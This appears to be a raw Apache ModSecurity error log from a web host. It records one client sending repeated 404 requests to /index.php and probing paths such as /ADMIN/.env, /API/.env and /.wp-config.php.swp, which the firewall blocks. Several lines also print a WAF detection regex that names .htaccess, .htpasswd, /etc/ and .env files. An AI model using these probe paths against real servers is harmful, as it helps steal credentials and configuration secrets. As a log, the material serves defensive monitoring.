[Tue May 26 14:49:34.289758 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToFAAAAPw"]
[Tue May 26 14:49:34.314451 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToEAAAAIw"]
[Tue May 26 14:49:34.317366 2026] [security2:error] [pid 648203:tid 648459] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToGwAAAQM"]
[Tue May 26 14:49:34.334764 2026] [security2:error] [pid 648203:tid 648369] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToMAAAAKk"]
[Tue May 26 14:49:34.336463 2026] [security2:error] [pid 648203:tid 648422] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToJQAAAN4"]
[Tue May 26 14:49:34.341107 2026] [security2:error] [pid 648203:tid 648412] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToJgAAANQ"]
[Tue May 26 14:49:34.347601 2026] [security2:error] [pid 648203:tid 648341] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToRwAAAI0"]
[Tue May 26 14:49:34.351528 2026] [security2:error] [pid 648203:tid 648345] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToNgAAAJE"]
[Tue May 26 14:49:34.354443 2026] [security2:error] [pid 648203:tid 648420] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToQgAAANw"]
[Tue May 26 14:49:34.355357 2026] [security2:error] [pid 648203:tid 648344] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToQAAAAJA"]
[Tue May 26 14:49:34.356614 2026] [security2:error] [pid 648203:tid 648405] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToSAAAAM0"]
[Tue May 26 14:49:34.356883 2026] [security2:error] [pid 648203:tid 648403] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToRQAAAMs"]
[Tue May 26 14:49:34.360118 2026] [security2:error] [pid 648203:tid 648424] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToMwAAAOA"]
[Tue May 26 14:49:34.362986 2026] [security2:error] [pid 648203:tid 648430] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToLQAAAOY"]
[Tue May 26 14:49:34.363853 2026] [security2:error] [pid 648203:tid 648444] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToSwAAAPQ"]
[Tue May 26 14:49:34.366245 2026] [security2:error] [pid 648203:tid 648356] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlpbEQDDtxJNiDrdToRAAAAJw"]
[Tue May 26 14:49:34.382974 2026] [security2:error] [pid 648203:tid 648410] [client 74.249.173.207:27844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.xn--seordeanimas-bhb.com.md-74.webhostbox.net"] [uri "/wp-content/uploads/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToXgAAANI"]
[Tue May 26 14:49:34.513117 2026] [security2:error] [pid 648203:tid 648433] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToYQAAAOk"]
[Tue May 26 14:49:34.569407 2026] [security2:error] [pid 648203:tid 648411] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTocAAAANM"]
[Tue May 26 14:49:34.573193 2026] [security2:error] [pid 648203:tid 648427] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTodwAAAOM"]
[Tue May 26 14:49:34.575940 2026] [security2:error] [pid 648203:tid 648458] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToggAAAQI"]
[Tue May 26 14:49:34.577955 2026] [security2:error] [pid 648203:tid 648435] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToeAAAAOs"]
[Tue May 26 14:49:34.578110 2026] [security2:error] [pid 648203:tid 648421] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTogwAAAN0"]
[Tue May 26 14:49:34.583607 2026] [security2:error] [pid 648203:tid 648371] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToegAAAKs"]
[Tue May 26 14:49:34.583643 2026] [security2:error] [pid 648203:tid 648447] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTofAAAAPc"]
[Tue May 26 14:49:34.584652 2026] [security2:error] [pid 648203:tid 648402] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTocwAAAMo"]
[Tue May 26 14:49:34.591553 2026] [security2:error] [pid 648203:tid 648340] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToigAAAIw"]
[Tue May 26 14:49:34.594769 2026] [security2:error] [pid 648203:tid 648429] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToiQAAAOU"]
[Tue May 26 14:49:34.604056 2026] [security2:error] [pid 648203:tid 648418] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTohwAAANo"]
[Tue May 26 14:49:34.606365 2026] [security2:error] [pid 648203:tid 648339] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToiAAAAIs"]
[Tue May 26 14:49:34.612248 2026] [security2:error] [pid 648203:tid 648334] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdToiwAAAIY"]
[Tue May 26 14:49:34.741259 2026] [security2:error] [pid 648203:tid 648284] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVlprEQDDtxJNiDrdToqwAA21A"]
[Tue May 26 14:49:34.749171 2026] [security2:error] [pid 648203:tid 648205] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/ADMIN/.env"] [unique_id "ahVlprEQDDtxJNiDrdToswAA2wE"]
[Tue May 26 14:49:34.757660 2026] [autoindex:error] [pid 648203:tid 648373] [client 45.148.10.95:0] AH01276: Cannot serve directory /home1/moesartc/public_html/leakyleaks.in/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 14:49:34.763213 2026] [security2:error] [pid 648203:tid 648325] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/API/.env"] [unique_id "ahVlprEQDDtxJNiDrdTouQAA23k"]
[Tue May 26 14:49:35.278090 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTojQAA2wQ"]
[Tue May 26 14:49:35.289365 2026] [security2:error] [pid 648203:tid 648400] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTojwAAAMg"]
[Tue May 26 14:49:35.340418 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTowAAA23s"]
[Tue May 26 14:49:35.346749 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTougAA2wk"]
[Tue May 26 14:49:35.347766 2026] [security2:error] [pid 648203:tid 648348] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTosgAAAJQ"]
[Tue May 26 14:49:35.349827 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTowQAA2wU"]
[Tue May 26 14:49:35.350344 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTorwAAAM8"]
[Tue May 26 14:49:35.352053 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTopgAAAMI"]
[Tue May 26 14:49:35.352830 2026] [security2:error] [pid 648203:tid 648336] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTouAAAAIg"]
[Tue May 26 14:49:35.353036 2026] [security2:error] [pid 648203:tid 648436] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTonQAAAOw"]
[Tue May 26 14:49:35.355265 2026] [security2:error] [pid 648203:tid 648362] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTorgAAAKI"]
[Tue May 26 14:49:35.356188 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTovwAA23Y"]
[Tue May 26 14:49:35.361430 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTouwAA218"]
[Tue May 26 14:49:35.364611 2026] [security2:error] [pid 648203:tid 648419] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlprEQDDtxJNiDrdTowgAA2wg"]
[Tue May 26 14:49:35.426751 2026] [security2:error] [pid 648203:tid 648326] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/APP/.env"] [unique_id "ahVlp7EQDDtxJNiDrdTo0gAA73o"]
[Tue May 26 14:49:35.457329 2026] [security2:error] [pid 648203:tid 648319] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/Api/.env"] [unique_id "ahVlp7EQDDtxJNiDrdTo1AAAsXM"]
[Tue May 26 14:49:35.490080 2026] [security2:error] [pid 648203:tid 648282] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/BACK/.env"] [unique_id "ahVlp7EQDDtxJNiDrdTo1QAA8k4"]
[Tue May 26 14:49:35.495560 2026] [security2:error] [pid 648203:tid 648312] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/BACKEND/.env"] [unique_id "ahVlp7EQDDtxJNiDrdTo1gAAxWw"]
[Tue May 26 14:49:35.498075 2026] [security2:error] [pid 648203:tid 648315] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/BE/.env"] [unique_id "ahVlp7EQDDtxJNiDrdTo1wAAxW8"]
[Tue May 26 14:49:35.500104 2026] [security2:error] [pid 648203:tid 648309] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/Backend/.env"] [unique_id "ahVlp7EQDDtxJNiDrdTo2QAAxWk"]
[Tue May 26 14:49:35.501653 2026] [security2:error] [pid 648203:tid 648305] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/Be/.env"] [unique_id "ahVlp7EQDDtxJNiDrdTo2gAAxWU"]
[Tue May 26 14:49:35.568883 2026] [security2:error] [pid 648203:tid 648392] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo5AAAAMA"]
[Tue May 26 14:49:35.570841 2026] [security2:error] [pid 648203:tid 648417] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo5wAAANk"]
[Tue May 26 14:49:35.577740 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo2AAAxQc"]
[Tue May 26 14:49:35.579487 2026] [security2:error] [pid 648203:tid 648357] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo6gAAAJ0"]
[Tue May 26 14:49:35.580864 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo6AAAAOQ"]
[Tue May 26 14:49:35.590410 2026] [security2:error] [pid 648203:tid 648388] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVlp7EQDDtxJNiDrdTo6wAAALw"]
